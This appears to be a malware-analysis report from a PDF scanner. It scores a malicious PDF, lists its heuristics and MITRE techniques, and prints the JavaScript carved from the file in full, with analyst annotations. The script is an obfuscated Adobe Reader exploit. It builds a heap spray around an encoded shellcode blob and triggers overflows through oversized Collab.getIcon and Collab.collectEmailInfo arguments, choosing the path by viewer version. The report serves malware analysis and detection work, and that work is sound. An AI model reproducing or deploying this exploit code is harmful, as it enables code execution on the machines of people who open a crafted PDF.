MALICIOUS
108
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
The PDF contains obfuscated JavaScript (API names assembled from hex escapes, junk comments, aliased `app`/`Array` globals) that builds a heap spray — a few hundred ~256K-character strings of 0x4242 filler each followed by a %u-encoded shellcode blob — and then calls version-gated Acrobat/Reader JavaScript APIs with oversized arguments: Collab.getIcon with a 0x0A-filled filename on viewerVersion >= 8, and Collab.collectEmailInfo with an oversized `msg` on viewerVersion 6.x/7.x. The shellcode starts with a short self-decoding stub (the report's rolling-XOR stager); its decoded stage is not visible in this listing, so "download and execute a second-stage payload" is inferred from the heuristic rule, not observed. The ML classifier (0.9995) and the obfuscated multi-stage heuristic together give high confidence this is a deliberate exploit rather than a benign scripted form.
Machine Learning
- Nyx PDF Classifier malicious score 0.9995
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPT — PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY — PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism. In this sample the spray is built directly in the script (see the extracted artifact below); the second stage was not recovered.
-
Embedded JS stream low PDF_JS — PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All seven URLs below are standard XMP/RDF/Dublin Core metadata namespace identifiers found in the PDF document text, not in the JavaScript; they are schema URIs, not download or C2 endpoints, and the extracted script references no URL at all (any download location would be inside the encoded shellcode, which is not decoded here).
- http://www.w3.org/1999/02/22-rdf-syntax-ns# — In PDF document text
- http://ns.adobe.com/pdf/1.3/ — In PDF document text
- http://ns.adobe.com/pdfx/1.3/ — In PDF document text
- http://ns.adobe.com/xap/1.0/ — In PDF document text
- http://ns.adobe.com/xap/1.0/mm/ — In PDF document text
- http://purl.org/dc/elements/1.1/ — In PDF document text
- http://ns.adobe.com/photoshop/1.0/ — In PDF document text
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0048_000.js | pdf-javascript-stream | PDF /JS object 48 at offset 0x50B | 4618 bytes |

SHA-256 (of the carved script): 52238c55fc1642aae97770d6c1e5beaef5cb30c11490197f67c5669134f9bc84
Preview script — first 1,000 lines of the extracted script (the listing below is well under that, so it appears to be the whole carved object). Caution: this is a live Acrobat/Reader JavaScript exploit. Read it in a text editor or a sandboxed analyzer; do not open the parent PDF in an unpatched viewer, and treat the listing as evidence (its SHA-256 is above) rather than as code to re-use.
// Acrobat/Reader JavaScript carved from /JS object 48. API and property names
// are assembled from hex escapes so that plain string-matching rules do not see
// them; the decoded values are noted inline. Analyst annotations only — the
// original junk trailing comments are left as found. Do not execute outside an
// isolated sandbox.
var sc
// `sc` is undefined here, so undefined + 0x60 is NaN on every iteration: this
// loop is dead filler (sc is fully overwritten by the unescape() call further
// down). `i` is an implicit global.
for(i=0;i<18000;i++)
sc=sc+0x60
// Alias for unescape(); used to turn %uXXXX sequences into 16-bit code units.
var unes=unescape//sjg'hs';[
// "byteToChar" -> used as util.byteToChar (Acrobat `util` API) in myunes().
var strTempA="\x62\x79\x74e\x54\x6f\x43\x68\x61\x72";
// "getI" + "con" -> "getIcon" (Collab.getIcon, the trigger called from exp()).
var strTempB="g\x65t\x49"//sgj;sdg
strTempB+="\x63\x6f\x6e";
// "collect" + "EmailInfo" -> "collectEmailInfo" (Collab.collectEmailInfo,
// the trigger called from start()).
var strTempC="c\x6fll\x65\x63\x74"//gfjl;hgs'lmh
strTempC+="\x45\x6d\x61\x69lInfo";
// Returns `what` concatenated `count` times ("" when count <= 0).
// Used to build the filler / sled-like strings for the spray and the
// oversized API arguments.
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
// Decodes a hex string two digits at a time. buf["length"] and buf["substr"]
// are the hex-escaped property names; each pair is converted with
// util.byteToChar(Number("0x" + pair)) (strTempA == "byteToChar").
// Depends on the Acrobat `util` object, so this is not portable JavaScript.
function myunes(buf) {
var ret=""
for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
ret = ret+util[strTempA](Number('\x30x'+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
}
return ret;
}
// Shellcode. Every "\x25\x75" is just "%u", so the whole literal is one
// %uXXXX-encoded byte string; mixing the two spellings defeats naive "%u"
// counting. unescape() yields UTF-16 code units, i.e. two raw bytes each,
// little-endian (first words: 41 43 49 4B EB 11 FC 5B ...). The 0xF9 byte
// recurring throughout (F9F9, F993, ...) is consistent with the report's
// "rolling-XOR stager".
// NOTE(review): the leading words look like a short self-decoding loop keyed
// on 0xF9 — confirm in a disassembler; the decoded second stage is not
// visible in this listing, so nothing about its behaviour is asserted here.
sc=unes("\x25\x75\x34\x334\x31\x25\x75\x34b\x349\x25\x7511EB\x25\x755BFC\x25\x75334B\x25\x7566C9\x25\x75b0B9\x25\x758001\x25\x750B34\x25\x75E2f9"+
"\x25\x75EBFA\x25\x75E805\x25\x75FFEB\x25\x75FFFF\x25\x75F911\x25\x75F9F9\x25\x75A3F9\x25\x7572AC\x25\x757815\x25\x759D15\x25\x75F9FD\x25\x7572F9"+
"\x25\x75110D\x25\x75F869\x25\x75F9F9\x25\x750172\x25\x751611\x25\x75F9F9\x25\x7570F9\x25\x7506FF"+
"\x25\x7591CF\x25\x756254\x25\x752684\x25\x75ED11\x25\x75F9F8\x25\x7570F9\x25\x75F5BF\x25\x75CF06"+
"\x25\x75D091\x25\x753FEB\x25\x7511AF\x25\x75F8FC\x25\x75F9F9\x25\x75BF70\x25\x7506E9\x25\x7591CF"+
"%uC5A0%u82FE%u0F11\x25\x75F9F9%u70F9%uEDBF%uCF06%u8791"+
"%u1B21%u118A%uF91E\x25\x75F9F9%uBF70%uCACD%u1230%u72FA"+
"%uC5B7%u387A%uA8FD\x25\x75F993%u06A8%uF5AF%u7AA0%u0601"+
"%u098D%uB9C4%uF9E6%u8FF9%u7010%uC5B7\x25\x75F993%uF993"+
"\x25\x75F993%uFB93%uF993%u8F06%u06C5%uE9AF%uBF70%u7ABD"+
"%uF901%u328D\x25\x75F993%uF993%uF993%uFD93%u8F06%u06BD"+
"%uEDAF%uBF70%u7AB1\x25\x75F901%u4C8D%uC178%uA9DC%uBFBD"+
"%uB772%u8CC5%u7854\x25\x75F941%uF9EB%uA9F9%uA99D%u8CBD"+
"%u7858%uFD41\x25\x75F9EB%u16F9%u1307%u8C57%u406C%uFFF9"+
"%uF9F9%u1578%uF1F9\x25\x75F9F9%uAEAF%u0972%u3F78%uEBE9"+
"\x25\x75F9F9%u3D72%u397A%u72F1%u0A01%u405D%uFFF9%uF9F9"+
"%uB0B0\x25\x75B0B0%uCD78%u17F1%u0707%u7C16%u8C30%uA608"+
"%u06A7%uC58F%u8F06\x25\x7506B1%uBD8F%u1906%uAFAC%u589D"+
"%uF9C9\x25\x75F9F9%u397C%uEA81%u72C7%uF5B9%u72C7%uE589"+
"%u72C7\x25\x75F1A7%uC754%u9172%u12F1%uC7F4%uB972%uC7CD"+
"%u5172%uF941\x25\x75F9F9%u22CA%u3C72%uA4A7%uFD3B%uAAF9"+
"%uAFAC\x25\x75CFAE%u9572%uE1DD%u72CF%uC5BC%u72CF%uFCAD"+
"%uFA81\x25\x75C72C%uB372%uC7E1%uA372%uFAD9%u1A24%uB0C5"+
"%u72C7%u72CD\x25\x750CFA%u06CA%uCA05%u5539%u3DC3%uFE8D"+
"%u3638\x25\x75FAF4%u1201%uCF0B%u85C2%uEDDD%u268C%u3B72"+
"\x25\x75397A%uC7DD%uE172%u24FA%uC79F%uF572%uC7B2%uA372"+
"\x25\x75FAE5\x25\x75C724\x25\x75FD72\x25\x75FA72\x25\x75123C\x25\x75CAFB\x25\x757239\x25\x75A62C"+
"%uA4A7%u3BA2\x25\x75F9F1%uF911%uF9F9%uA1F9%u397A%u3AFC");
// "setTimeOut" -> app.setTimeOut (Acrobat API; it takes a code *string*, which
// is how "exp()" / "start()" are scheduled at the bottom of the script).
strTempD="\x73etTimeOu\x74"
// Heap spray + trigger for viewerVersion >= 8 (scheduled via app.setTimeOut).
// All variables below are implicit globals. Spray block = 128 x five 0x4242
// words ("BBBBBBBBBB") followed by the shellcode `sc`.
function exp() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
// wap = 20 + blah.length ("length" is hex-escaped); double bbk until it is at
// least that long.
wap = 20+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
// "substring" (hex-escaped). bk grows until bk.length + wap >= 262144 code
// units, i.e. each spray element lands at roughly 256K characters.
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["l\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
// 350 copies of (filler + shellcode) kept alive in a global array: the spray.
mm = new Array()//afha][]ajf
for (i=0;i<350;i++) mm[i] = bk + blah;
// Trigger argument: myunes("0a0a0a0a") is four 0x0A characters, repeated 4096
// times (16384 characters), then "_N.bundle" (hex-escaped below).
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
// Collab.getIcon(<oversized string>) — the actual trigger on this path.
// NOTE(review): an oversized Collab.getIcon argument is a historically
// exploited Adobe Reader API; map it to the CVE in your own tracking, the
// report does not name one.
Collab[strTempB](of+a[0x0]);
}
// Aliases for the Acrobat `app` object and the Array constructor, so that
// `app.viewerVersion`, `app.setTimeOut` and `new Array()` never appear literally.
var jkdhg=app
var sghfjs=Array
// Trigger path for viewerVersion < 8 (scheduled via app.setTimeOut after 1200 ms).
// jkdhg == app, sghfjs == Array. Both branches build `plin`, the oversized
// `msg` handed to Collab.collectEmailInfo at the end.
function start()
{
if (jkdhg.viewerVersion >= 7.0)
{
// viewerVersion 7.x: no separate spray; `plin` itself is
// 1124 x (%u0b0b%u0028%u06eb%u06eb) + one variant block + %u4346%u4a4b
// + 122 more of the first block + the shellcode `sc` + 1256 x (%u4a4b%u4748).
// This is the only branch that embeds the shellcode in the trigger argument.
plin =rep(1124,unes("\x25\x750b0b\x25\x750028\x25\x7506eb\x25\x7506eb")) + unes("\x25\x750b0b\x25\x750028\x25\x750aeb\x25\x750aeb") + unes("\x25\x754346\x25\x754a4b") + rep(122,unes("\x25\x750b0b\x25\x750028\x25\x7506eb\x25\x7506eb")) + sc + rep(1256,unes("\x25\x754a4b\x25\x754748"));
}
else
{
// viewerVersion < 7: same spray construction as exp() (hex-escaped "length" /
// "substring"), but 250 blocks instead of 350, followed by a trigger string of
// 8000 x "%u0a0a%u0a0a" (32000 characters of 0x0A).
blah = rep(128, unes("\x25\x754242\x25\x754242\x25\x754242\x25\x754242\x25\x754242")) +""+ sc
bbk = unes("\x25\x754242\x25\x754242");
wap = 20+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["l\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new sghfjs()//ahplgha[
for (i=0;i<250;i++) mm[i] = bk + blah;
plin = rep(8000, unes("\x25\x75\x30a\x30a\x25\x75\x30a\x30a"));
}
// "viewerVersion" (hex-escaped). Collab.collectEmailInfo({subj:0, msg:<oversized>})
// is the actual trigger for 6.x and 7.x; below 6.0 only the spray runs.
// NOTE(review): historically exploited Adobe Reader API — map it to the CVE in
// your own tracking, the report does not name one.
if (jkdhg["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 6.0)//gakghfvlgfal
{
Collab[strTempC]({subj:0,msg:plin});
}
}
// Entry point: dispatch on app.viewerVersion ("viewerVersion" hex-escaped)
// via app.setTimeOut(<code string>, ms) (strTempD == "setTimeOut"):
//   >= 8.0 -> exp()   after 12 ms   (Collab.getIcon path)
//   else   -> start() after 1200 ms (Collab.collectEmailInfo path, itself
//             gated on viewerVersion >= 6.0)
// The timer handle `shaft` is never used; the delay just lets the document
// finish loading before the spray and trigger run.
if(jkdhg["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 8.0)
{
var shaft = jkdhg[strTempD]("exp()",12);
}
else{
var shaft = jkdhg[strTempD]("start()",1200);
}